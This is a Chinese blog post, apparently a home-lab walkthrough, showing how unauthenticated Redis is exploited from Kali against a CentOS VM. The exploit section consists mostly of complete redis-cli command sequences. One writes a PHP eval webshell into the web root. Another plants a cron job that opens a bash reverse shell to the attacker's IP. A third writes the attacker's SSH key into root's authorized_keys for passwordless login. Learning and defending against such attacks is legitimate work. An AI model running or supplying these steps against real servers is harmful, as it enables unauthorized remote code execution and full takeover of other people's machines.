【渗透】Redis 未授权访问漏洞利用(三种利用方式)

最新推荐文章于 2024-03-18 13:55:55 发布
最新推荐文章于 2024-03-18 13:55:55 发布
阅读量1.9k 收藏 9
点赞数 2
分类专栏: 渗透
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43427482/article/details/114795007
版权
  • 起序:是因为我同学的云服务器被黑了,被挖矿了,原因就是 redis 可以未授权访问,还是 root 级别的,我直接好家伙,整理记录一下。

一、软件环境

  • 虚拟机:VMware Workstation 15.5.1 Pro
  • Kali:kali-linux-2020.4-installer-amd64.iso
  • CentOS:CentOS-7-x86_64-DVD-2003.iso
  • redis-5.0.5.tar.gz

二、环境搭建

1、CentOS 环境配置

1、启动 Web 服务

安装 httpd 服务,目的是为了下面的 写入一句话 的漏洞利用。

yum install httpd

在这里插入图片描述

开启 web 服务,当前靶机的 IP 地址为 192.168.1.137

systemctl start http.service

在这里插入图片描述

如果服务器没有 php 环境,访问 Web 的时候,php 文件是不解析的。(已踩过坑,后来的同志们不要再踩了)
下面链接是之前做的,里面有安装 php 环境的方法,我这里就不想写了,把离线安装看完就行了,如果网络好的话那就用在线安装。php72 依赖包在该文章中提供了。
希望你能看懂。希望你不要光看图片,多看看文字。

在这里插入图片描述

2、启动 redis 服务

如何安装,可以参考下面文章。

  • 没有写,哈哈哈。

关闭 IP 绑定,允许主机远程连接 redis 服务。用 # 号注掉。

在这里插入图片描述

关闭保护模式,允许主机远程连接 redis 服务。

在这里插入图片描述

启动 redis 服务

./bin/redis-server ./conf/redis.conf

在这里插入图片描述

2、Kali 环境配置

安装 redis-cli,可以参考下面文章。

三、漏洞利用

1、写入一句话

1、前提条件
  1. 已知 web 服务的绝对路径;
  2. redis 对 web 目录有写入权限;
2、漏洞利用

/var/www/html 目录下写入一句话木马。

# kali 的 redis-cli 连上 CentOS 的 redis 服务
redis-cli -h 192.168.1.137 -p 6379

# 设置保存的目录
192.168.1.137:6379> config set dir /var/www/html
# 设置保存的文件
192.168.1.137:6379> config set dbfilename shell.php
# 设置保存的内容
192.168.1.137:6379> set x "<?php @eval($_POST['shell']);?>"
# 保存
192.168.1.137:6379> save

在这里插入图片描述

已经将一句话木马写在了 /var/www/html 目录下,中国蚁剑连接一下。

在这里插入图片描述

2、计划任务反弹 shell

1、前提条件
  1. redis 以 root 权限运行;
2、漏洞利用

kali 进行监听。

nc -nvlp 1314

在这里插入图片描述

/var/spool/cron/ 写入定时任务。

# kali 的 redis-cli 连上 CentOS 的 redis 服务
redis-cli -h 192.168.1.137 -p 6379

# 设置保存的目录
192.168.1.137:6379> config set dir /var/spool/cron/
# 设置保存的文件
192.168.1.137:6379> config set dbfilename root
# 设置保存的内容	/bin/bash -i >& /dev/tcp/{攻击机 IP}/{端口} 0>&1
192.168.1.137:6379> set x "\n\n*/1 * * * * /bin/bash -i >& /dev/tcp/192.168.1.107/1314 0>&1\n\n"
# 保存
192.168.1.137:6379> save

在这里插入图片描述

需要等一会,然后查看监听结果。

在这里插入图片描述

3、ssh 免密登陆

1、前提条件

2、漏洞利用

kali 本机生成一对公私钥。

ssh-keygen -t rsa

在这里插入图片描述

查看 id_rsa.pub 内容。

在这里插入图片描述

上传公钥到靶机的 .ssh 目录下(首先 .ssh 文件要存在,我是在靶机 /root 目录下新建的 .ssh 文件)。下面是在 kali 上操作的。

# kali 的 redis-cli 连上 CentOS 的 redis 服务
redis-cli -h 192.168.1.137 -p 6379

# 设置保存的目录
192.168.1.137:6379> config set dir /root/.ssh/
# 设置保存的文件
192.168.1.137:6379>config set dbfilename authorized_keys
# 设置保存的内容
192.168.1.137:6379> set x "\n\n\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDaRhV49ZWIyTzDu2w6BdDtv4Ej7uouX2G4pgk6Q8pTvZ9rqrQRJvgqlc6/K7BQKltLUpU0Pc/81S2kyDVo5PMm+GPSX8AEHUzW6OaJbMJxAUNZFTRdBgKslpsu3sjJAcm+qDOFpa9qwztoKofwE//mcwy/CflxGVIShOY1T3OKqy8gEBGDvBkulcdXd5EBBJ+OBmF+CQTSTkf7LrUV8+Yx/vMMb0/ZwJ4xeiXiN2GqF/eMjnX/3wugFgMG9YUB+KJWsVxMpul2p14rOHQ5BuNv35VQCZXz7b1w/5eeJ4nLulR5D4qZMgTRA82lFPcABN3pKi+MR0+H9rOE5sqD8OO19CWEonk/N3GkEiFYoiGojRQIQ+WxbGT4bP/V20w7uVZ6Fr6MeVdi1t/fjpVlQ299iQDEIL9F8R96hGAc296HVtcKiG2WHY3SrdsCDPohBim4U0WDmP5yhgxUMVKA0kzdJkGds3zpUpE7xvyrIY8I9Ppo0ple5+ff0ykkkvDJxpE= root@kali\n\n\n"
# 保存
192.168.1.137:6379> save

在这里插入图片描述

kali 本机 ssh 私钥连接。

ssh -i id_rsa root@192.168.1.137 -p 22

在这里插入图片描述

如果对您有帮助,点个赞再走吧。

边扯边淡
关注
  • 2
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
渗透测试-Redis授权访问漏洞利用
cdyunaq的博客
12-24 1135
危害 信息泄露 系统信息 redis保存的信息 写文件GetShell 在Web目录中写入webshell 写入SSH公钥直接连接 写入计划任务(corntab)反弹shell 高级利用 主从复制getshell(4.x version < 5.0.5) 模块加载执行命令(> 4.x) 环境准备 机型 ip 服务 版本 攻击机
redis授权访问漏洞利用+redis日志分析
ChenD的学习笔记
05-22 1413
下载: wget http://download.redis.io/releases/redis-2.8.17.tar.gz。将redis-server复制到/usr/bin目录下:cp redis-server /usr/bin/将只允许本地连接注释掉,保护模式关掉,然后保存一下,再启动redis服务,再使用kali连接一下。将redis-cli复制到/usr/bin目录下:cp redis-cli /usr/bin/将redis-server 移动到/usr/bin/
Redis授权访问漏洞 介绍+利用+修改加固
ploto_cs的博客
04-30 1163
Redis授权访问漏洞 最近在对外的渗透测试中挖到了一个Redis授权访问漏洞,鉴于点到为止的原则,没有继续渗透下去,这篇文章特此介绍并复现该漏洞危害性。 一.漏洞介绍 Redis 默认情况下,会绑定在 0.0.0.0:6379,如果没有进行采用相关的策略,比如添加防火墙规则避免其他信任来源 ip 访问等,这样将会将 Redis 服务暴露到公网上,如果在没有设置密码认证(一般为空)的情况下,会导致任意用户在可以访问目标服务器的情况下授权访问 Redis 以及读取 Redis 的数据。攻击者在授权访
Redis渗透方法汇总(知识汇总)
最新发布
瓦罗兰特顶级C位的博客
03-18 864
REmote DIctionary Server(Redis)是一个由 Salvatore Sanfilippo写的key-value存储系统。
Redis数据库授权访问漏洞的三种利用方式
zh的博客
10-22 3471
漏洞描述: 由于Redis默认是运行在TCP的6379端口上,而且默认安装没有设置用户访问认证,也没有访问IP限制,这样导致端口开放后,对Redis服务可以直接匿名访问,并且可对数据库进行匿名操作,信息泄露,执行命令等操作。 一、Redis数据库安装 虚拟机CentOS7,Xshell连接,拷贝安装包,解压 cd 看看有什么 src 源码所在的文件夹 安装编译工具:make 和 gcc 记得选Y 安装完成 进入src目录,执行命令:make 编译完...
Redis授权访问漏洞利用
qq_46634561的博客
09-22 1279
一,Centos7下redis授权访问漏洞利用方式1、何为redis,有什么内涵2、获取web服务的webshell3、写ssh-keygen公钥登录服务器4、利用计划任务执行命令反弹shell 1、何为redis,有什么内涵 一、Redis介绍 Redis是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。从2010年3月15日起,Redis的开发工作由VMware主持。从2013年5月开始,Redis的开发由Pivotal赞助
Redis授权访问漏洞引出的漏洞利用方式
Chu_Jian_Xiong的博客
11-20 1098
redis授权访问漏洞是一个由于redis服务版本较低其设置登录密码导致的漏洞,攻击者可直接利用redis服务器的ip地址和端口完成redis服务器的远程登录,对目标服务器完成后续的控制和利用
Redis授权访问漏洞的重现与利用
qq_40882763的博客
03-24 1816
Redis 默认情况下,会绑定在 0.0.0.0:6379,,如果没有进行采用相关的策略,比如添加防火墙规则避免其他信任来源 ip 访问等,这样将会将 Redis 服务暴露到公网上,如果在没有设置密码认证(一般为空)的情况下,会导致任意用户在可以访问目标服务器的情况下授权访问 Redis 以及读取 Redis 的数据。
Celery 4.0 Redis授权访问+Pickle反序列化利用(celery3_redis_unauth)POC
09-29
Celery 4.0 Redis授权访问+Pickle反...Celery 版本默认使用Pickle进行任务消息的序列化传递,当所用队列服务(比如Redis、RabbitMQ、RocketMQ等等等)存在授权访问问题时,可利用Pickle反序列化漏洞执行任意代码。
java开源包1
06-28
API访问授权的开放标准 OAuth OAuth 协议为用户资源的授权提供了一个安全的、开放而又简易的标准。与以往的授权方式不同之处是OAUTH的授权不会使第三方触及到用户的帐号信息(如用户名与密 码),即第三方无需使用...
JAVA上百实例源码以及开源项目
01-03
 通过网络或磁盘等方式,把公钥编码传送给李四,李四接收到张三编码后的公钥,将其解码,李四用张三的公钥加密信息,并发送给李四,张三用自己的私钥解密从李四处收到的信息…… Java利用DES私钥对称加密代码实例 ...
java开源包11
06-28
API访问授权的开放标准 OAuth OAuth 协议为用户资源的授权提供了一个安全的、开放而又简易的标准。与以往的授权方式不同之处是OAUTH的授权不会使第三方触及到用户的帐号信息(如用户名与密 码),即第三方无需使用...
java开源包2
06-28
API访问授权的开放标准 OAuth OAuth 协议为用户资源的授权提供了一个安全的、开放而又简易的标准。与以往的授权方式不同之处是OAUTH的授权不会使第三方触及到用户的帐号信息(如用户名与密 码),即第三方无需使用...
redis授权漏洞详细利用
pray030的博客
02-23 3643
r
redis授权访问漏洞(三种方法)
网安小白的博客
08-30 4419
redis授权访问复现,含写入webshell、linux计划任务反弹shell、写入ssh公钥实现ssh登录三种方法~
redis授权访问漏洞利用
weixin_53562844的博客
05-07 2144
redis是一个key-value存储系统,拥有强大的功能,目前普及率很高,redis是用ansic语言编写,支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的APL,reids默认端口是6379。造成授权漏洞的原因是安全配置作限制,redis默认情况是空密码连接。 利用条件:redis <3.2 利用原理:redis绑定在0.0.0.0:6379,且没有进行添加安全策略,直接暴露在公网,默认是空密码,可以让攻击者免密码登录redis服务。 靶机:192.
系统渗透漏洞の授权访问
蜗牛驿站
06-27 1410
背景:    我们做的页面是嵌套在营销系统中,所以没有登录界面,造成了直接访问 ip:port/地址可以进入,这样造成了安全隐患思路;    想到了加上过滤器,在用户登录成功之后,才授权登录访问页面(当用户登录成功后,将用户信息存在session中,过滤器判断当session中有用户信息才可放行)添加过程:    1.首先在web.xml中添加过滤器配置其中url-pattern 为限制的范围,根...
Redis授权访问利用方式
sinat_36853972的博客
10-14 706
Redis授权访问利用方式 复现环境 攻击机:kali2020 目标:kali(旧版) redis版本:V4.0.11 Redis安装参考:https://blog.csdn.net/Hack_Different/article/details/82811497 授权访问测试脚本 import socket import sys def try_login(ip, port): addr = (ip, int(port)) try: # 设置连接超时时间
Redis授权访问利用
weixin_45682070的博客
06-09 344
Redis Redis因配置不当可以授权访问。攻击者无需认证访问到内部数据,可导致敏感信息泄露,也可以恶意执行flushall来清空所有数据。 攻击者可通过EVAL执行lua代码,或通过数据备份功能往磁盘写入后门文件。 如果Redis以root身份运行,可以给root账户写入SSH公钥文件,直接通过SSH登录受害服务器。 本地漏洞环境搭建 本地环境kali是自身连接自身(不想开两个虚拟机了) wget http://download.redis.io/releases/redis-3.2.0.tar.gz
redis授权访问漏洞修复
11-03
为修复Redis授权访问漏洞,可以采取以下措施: ``` 代码块1: 1. 修改redis.conf配置文件,将bind 127.0.0.1改为bind 0.0.0.0,这样Redis只会监听本机的IP地址,而不是所有的IP地址。 2. 设置Redis密码,可以在redis.conf配置文件中设置requirepass参数,或者在Redis启动后使用config set命令设置。 3. 使用iptables等防火墙软件,限制Redis服务只能被信任的IP地址访问。 ``` 相关问题:

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

边扯边淡

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值